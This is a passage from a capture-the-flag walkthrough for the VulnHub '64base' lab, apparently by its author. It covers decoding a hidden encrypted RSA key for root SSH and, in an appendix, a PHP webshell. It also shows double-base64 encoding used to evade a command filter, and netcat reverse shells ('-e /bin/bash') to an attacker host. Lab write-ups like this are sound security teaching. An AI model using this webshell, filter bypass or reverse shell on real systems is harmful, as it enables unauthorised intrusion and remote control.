[email protected]:~$ cd /
[email protected]:/$ pwd
/


And now, we can easily use the command find to discover flag5. Witch decodes and allows us to go on to investigate the file.

[email protected]:/$ find / -name flag5*
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
[email protected]:/$ echo TG9vayBJbnNpZGUhIDpECg==|base64 -d
Look Inside! :D

[email protected]:/$ file /var/www/html/admin/S3cR37/flag5*
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, \
JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, \
comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", \
baseline, precision 8, 960x720, frames 3

Some more hex data then? but is that all of it?

[email protected]:/$ strings /var/www/html/admin/S3cR37/flag5*|/usr/bin/head
JFIF
4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c\
517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a62\
6d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155\
457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d46\
4a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a\
6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756\
615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433\
626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a\
624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a32347955\
3246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d56687952\
54414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45\
704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a42695931\
5a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a\
4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a51\
72656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d327068\
0a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c63477474\
4d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276\
636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961\
576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c7162\
7a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c32\
7834595663725357313562574d7854566870536b316962554e360a62455233436c5242563231686357\
7453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e\
71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d51\
7a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b\
4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c3656335279\
64677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d46564954\
6b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a6546467154\
7a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a5746\
5a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554\
677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467\
770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74\
505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a534446\
75626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e\
617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a\
5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a\
54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65\
466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a\
4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f453570566770795533\
4a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b\
765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a593235\
30436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e47\
64454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35\
596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d55\
6e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e65\
4774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b\
706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e564739706446\
6f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a5756\
6f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a\
734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f\
77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33\
563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f3162584244\
4b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f\
46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553\
457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a\
4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48\
514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a\
575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d5642\
4c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b74\
4c5330744c516f3d0a
$Wbr
%4568CDgt
&9ESTVcsu
'7FGdf
(Uev
#3Rbr
mX$S(
-E=m
[email protected]:/$

That’s a big chunk of data.

[email protected]:/$ echo \
> 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c\
> 517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a62\
   
   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~
   
> 575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d5642\
> 4c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b74\
> 4c5330744c516f3d0a|xxd -p -r|base64 -d
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C

mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
+T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
+j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
/Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
-----END RSA PRIVATE KEY-----
[email protected]:/$

Nice! A private rsa-key :D Let’s save it to tmp, set the correct permissions, and see if it works for ssh access to root!

[email protected]:/$ echo \
> 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c\
> 517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a62\
   
   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~
   
> 575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d5642\
> 4c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b74\
> 4c5330744c516f3d0a|xxd -p -r|base64 -d > /tmp/rsa-key
[email protected]:/$ chmod 600 /tmp/rsa-key 
[email protected]:/$ ssh [email protected] -p 62964 -i /tmp/rsa-key 
Could not create directory '/64base/.ssh'.
The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.
ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
Enter passphrase for key '/tmp/rsa-key': 

Password protected of course! troll

But. wait. flag5 was a JPEG file! Using SCP to copy it off we can open it with an image viewer.

[email protected]:~# scp -P 62964 [email protected]:/var/www/html/admin/S3cR37/flag5* \
> flag5.jpeg
flag5{TG9vayBJbnNpZGUhIDpECg==}                    100%  192KB  67.8MB/s   00:00

Imperial-Class

USE THE FORCE it says.

Retrying SSH using a password of usetheforce for the private key give us root and at last we have flag6.

[email protected]:/$ 
[email protected]:/$ ssh [email protected] -p 62964 -i /tmp/rsa-key 
Could not create directory '/64base/.ssh'.
The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.
ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
Enter passphrase for key '/tmp/rsa-key': 

Last login: Wed Dec  7 16:27:53 2016 from localhost

flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2\
OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNj\
g0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0\
NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YT\
RlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
[email protected]:~# 

And we decode the flag one last time…

[email protected]:~# echo \
> NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2\
> OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNj\
> g0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0\
> NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YT\
> RlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK\
> |base64 -d|xxd -p -r|base64 -d|xxd -p -r|base64 -d
base64 -d /var/local/.luke|less.real

And, we have found the plans and completed the challenge!

        __          __  _ _   _____                      
         \ \        / / | | | |  __ \                     
          \ \  /\  / /__| | | | |  | | ___  _ __   ___    
           \ \/  \/ / _ \ | | | |  | |/ _ \| '_ \ / _ \   
            \  /\  /  __/ | | | |__| | (_) | | | |  __/   
         __  \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _ 
         \ \   / /          |  __ \(_)   | | |_   _| | | |
          \ \_/ /__  _   _  | |  | |_  __| |   | | | |_| |
           \   / _ \| | | | | |  | | |/ _` |   | | | __| |
            | | (_) | |_| | | |__| | | (_| |  _| |_| |_|_|
            |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_)
    
_____ _ _ _ __ __ __  _ ___ _   __  ___  __ __  __  _  ___ _ _  __ _________
%=x%= | |V| |_)|_ |_) | |_| |   |_) |_| (_  |_  |_) |  |_| |\| (_  %=x%=x%=x
~~~~~ | | | |  |_ | \ | | | |_  |_) | | __) |_  |   |_ | | | | __) ~~~~~~~~~
LS
                 .-. .-.
               .=========.         E x t e r i o r ,   A e r i a l   V i e w
               ||.-.7.-.||         -----------------------------------------
               ||`-' `-'||
               `========='
                `-'| |`-'8               1 .............. Sensor Suite Tower
          ______   |9|   ______          2 ... Heavy Twin Turbolaser Turrets
         /     /\__| |__/\     \         3 ............. Heavy Laser Turrets
        /  \_ / /  |_|  \ \ _/  \        4 ....... TIE Fighter Launch Chutes
       /___(\\\/         \///)___\       5 ............... Heavy Blast Doors
       \____\\`==========='//____/       6 .................... Guard towers
       /     '/ .-------. \\     \       7 ........ Shuttle Landing Platform
    __/     //. \`+---+'/ .\\     \__    8 ........... AT-AT Docking Station
   /\ \    ///x`.\|___|/.'x\\\    / /\   9 ................. Connecting Ramp
  /  \ \  //`-._//|   |\\_.2'\\  / /  \
 /  _.-==='_____//.-=-.\\_____`===-._  \
 \   `-===.\-.  \ `-=1' /  .-/.===-' 3 / The pre-fabricated,  multi-function
  \  / /  \\\ \  \.===./  /4///  \ \  /  Imperial garrison base is the back-
   \/_/    \\\ | /.---.\ | ///    \_\/   bone of the  Empire's  occupational
      \     \\\|/ |_m_| \|///     /      forces. These heavily-armoured for-
       \_____\=============/_____/       tresses have  walls up to 10 meters
       /____///    ___    \\\____\       thick  to  guard   against   ground
       \   (_//\__|||||__/\\_)   /       assaults,  and  powerful  deflector
        \  /  \|,,|||||,,|/  \  /        shields  protect  them  for  air or
         \_____|  | 5 | 6|_____/         space attacks.
               `--'   `--'
____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~

____________________________________________________________________________

  ______  ______  ______  ______  ______  ______  ______  ______  
 |______||______||______||______||______||______||______||______||______| 
  _   _   ____ __          __ __     __ ____   _    _  _  _____   ______  
 | \ | | / __ \\ \        / / \ \   / // __ \ | |  | |( )|  __ \ |  ____| 
 |  \| || |  | |\ \  /\  / /   \ \_/ /| |  | || |  | ||/ | |__) || |__    
 | . ` || |  | | \ \/  \/ /     \   / | |  | || |  | |   |  _  / |  __|   
 | |\  || |__| |  \  /\  /       | |  | |__| || |__| |   | | \ \ | |____  
 |_| \_| \____/    \/  \/        |_|   \____/  \____/    |_|  \_\|______| 
                                _  ______  _____  _____  _                
             /\                | ||  ____||  __ \|_   _|| |               
            /  \               | || |__   | |  | | | |  | |               
           / /\ \          _   | ||  __|  | |  | | | |  | |               
          / ____ \        | |__| || |____ | |__| |_| |_ |_|               
         /_/    \_\        \____/ |______||_____/|_____|(_)               
  ______  ______  ______  ______  ______  ______  ______  ______  ______  
 |______||______||______||______||______||______||______||______||______| 
                                                                          

                    I hope you enjoyed this challenge
                    Please leave comments & feedback
                    @ https://www.vulnhub.com/?q=64base
                    -----------------------------------
                    64Base Challenge by ȜӎŗgͷͼȜ
                    @ https://ȜӎŗgͷͼȜ.ninja   
                    -----------------------------------

And That’s All Folks* (well almost)

Drop me a comment on here or email me your thoughts.

Thanks,

ȜӎŗgͷͼȜ


** The Following Applies To The Updated Version (Ver_1.0.1) Only **

Writing WebShells

For completeness I have added a description of how it’s also possible to create a secondary webshell and go on to establish a TCP reverse shell as the www-data user.

I decided to allow this in an updated version of the challenge because I suspected I’d maybe made it a little too specific to get a terminal shell on the original version. Plus, I think it’s pretty fun playing with webshells and wanted people to be able to do this just for the joy of it :D.

As some of you will have discovered, the commands available to the login.php script are restricted and only allow things such as ls -al, cat, echo, netstat, whoami as well as a few others. We can however write files to the current directory using a command such as echo testing123 > test.txt.

Let’s use curl again to give that a try.

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s "http://172.16.0.19/Imperial-Class/BountyHunter/login.php?\
> f=system&c=echo%20testing123%20>%20test.txt"|grep -v "</"
Debian GNU/Linux 8 \n \l

Thu Dec 15 06:14:54 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
          inet addr:172.16.0.19  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s "http://172.16.0.19/Imperial-Class/BountyHunter/test.txt"
testing123


Next, a sensible thing to try is to test for the ability to write php code to a file with a command such as echo "<?php phpinfo();?>" > phpinfo.txt this fails however. This is because some key special characters are filtered such as <, ?, /, ', = & ;.

Maybe we can use nc to create a reverse shell.

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s "http://172.16.0.19/Imperial-Class/BountyHunter/login.php?\
> f=system&c=nc%20192.168.0.21%201234%20-e%20/bin/bash"|grep -v "</"
Debian GNU/Linux 8 \n \l

Sat Dec 17 15:51:52 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
          inet addr:172.16.0.19  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░
░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░
░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░
░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░
░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░
░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░
░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░
░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░
░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░
░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░
░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░
░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░
░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░
░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░
░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░
░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░
░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░
░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░
░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░
░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█
Is this the net cat you are looking for?

Thats right! troll

Again, what’s the challenge called? and what tool does it keep relying on?

Let’s use base64 once more to try to bypass the filtering and write a php webshell of our own.


Bypass Filtering

Here’s the code of a simple php webshell webshell.php.

<body bgcolor=#000000><font color=#cfbf00>
<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

Then we convert it to a base64 string.

[email protected]:~# base64 webshell.php -w 999
PGJvZHkgYmdjb2xvcj0jMDAwMDAwPjxmb250IGNvbG9yPSNjZmJmMDA+Cjw/cGh\
wCmlmKGlzc2V0KCRfUkVRVUVTVFsnY21kJ10pKXsKICAgICAgICBlY2hvICI8cH\
JlPiI7CiAgICAgICAgJGNtZCA9ICgkX1JFUVVFU1RbJ2NtZCddKTsKICAgICAgI\
CBzeXN0ZW0oJGNtZCk7CiAgICAgICAgZWNobyAiPC9wcmU+IjsKICAgICAgICBk\
aWU7Cn0KPz4K

However, this contains the forbidden / character.

Not to worry. We can just double encode/decode it ;D

[email protected]:~# base64 webshell.php -w 99|base64 -w 999
UEdKdlpIa2dZbWRqYjJ4dmNqMGpNREF3TURBd1BqeG1iMjUwSUdOdmJHOXlQU05\
qWm1KbU1EQStDancvY0dod0NtbG1LR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25ZMj\
FrSjEwCnBLWHNLSUNBZ0lDQWdJQ0JsWTJodklDSThjSEpsUGlJN0NpQWdJQ0FnS\
UNBZ0pHTnRaQ0E5SUNna1gxSkZVVlZGVTFSYkoyTnRaQ2RkS1RzS0lDQWdJQ0Fn\
SUNCemVYTjBaVwowb0pHTnRaQ2s3Q2lBZ0lDQWdJQ0FnWldOb2J5QWlQQzl3Y21\
VK0lqc0tJQ0FnSUNBZ0lDQmthV1U3Q24wS1B6NEsK

Now we can create a curl command to write this to a php file in our current directory and test it out.

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s "http://172.16.0.19/Imperial-Class/BountyHunter/login.php?\
> f=system&c=echo%20UEdKdlpIa2dZbWRqYjJ4dmNqMGpNREF3TURBd1BqeG1\
> iMjUwSUdOdmJHOXlQU05qWm1KbU1EQStDancvY0dod0NtbG1LR2x6YzJWMEtD\
> UmZVa1ZSVlVWVFZGc25ZMjFrSjEwCnBLWHNLSUNBZ0lDQWdJQ0JsWTJodklDS\
> ThjSEpsUGlJN0NpQWdJQ0FnSUNBZ0pHTnRaQ0E5SUNna1gxSkZVVlZGVTFSYk\
> oyTnRaQ2RkS1RzS0lDQWdJQ0FnSUNCemVYTjBaVwowb0pHTnRaQ2s3Q2lBZ0l\
> DQWdJQ0FnWldOb2J5QWlQQzl3Y21VK0lqc0tJQ0FnSUNBZ0lDQmthV1U3Q24w\
> S1B6NEsK|base64%20-d|base64%20-d%20%3E%20webshell.php"
<body bgcolor=#000000><font color=#cfbf00> <h2>[64base Command Shell]</h2> <pre>
<h4>flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}</h4>
Debian GNU/Linux 8 \n \l

Sat Dec 17 17:50:35 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
          inet addr:172.16.0.19  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link

Now we can use webshell.php to execute any system commands we want without our input being filtered.

Imperial-Class

Here, there are really a multitude of commands we could run now to gain a TCP shell. In this example though I’m keeping it pretty simple.

Using the locate command we discover another version of netcat (nc.real).

Imperial-Class

And, after playing around with it we are able to create a reverse shell as www-data.

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s 'http://172.16.0.19/Imperial-Class/BountyHunter/webshell.php?\
> cmd=nc.real%20172.16.0.3%201337%20-e%20/bin/bash' >/dev/null \
> & nc -nvlp 1337
[1] 2013
listening on [any] 1337 ...
connect to [172.16.0.3] from (UNKNOWN) [172.16.0.19] 39566

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
64base:x:1001:1001::/64base:/bin/rbash

find / -name flag5*
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}

From here you can obviously solve the rest of the challenge and get the last two flags as already described above. So there’s no need for me to repeat myself again here. ;D


If you’ve read this walkthrough all the way to the bottom then I salute you!

Again, Drop me a comment on here or email me your thoughts.

I hope you enjoyed the challenge.

Thanks again,

ȜӎŗgͷͼȜ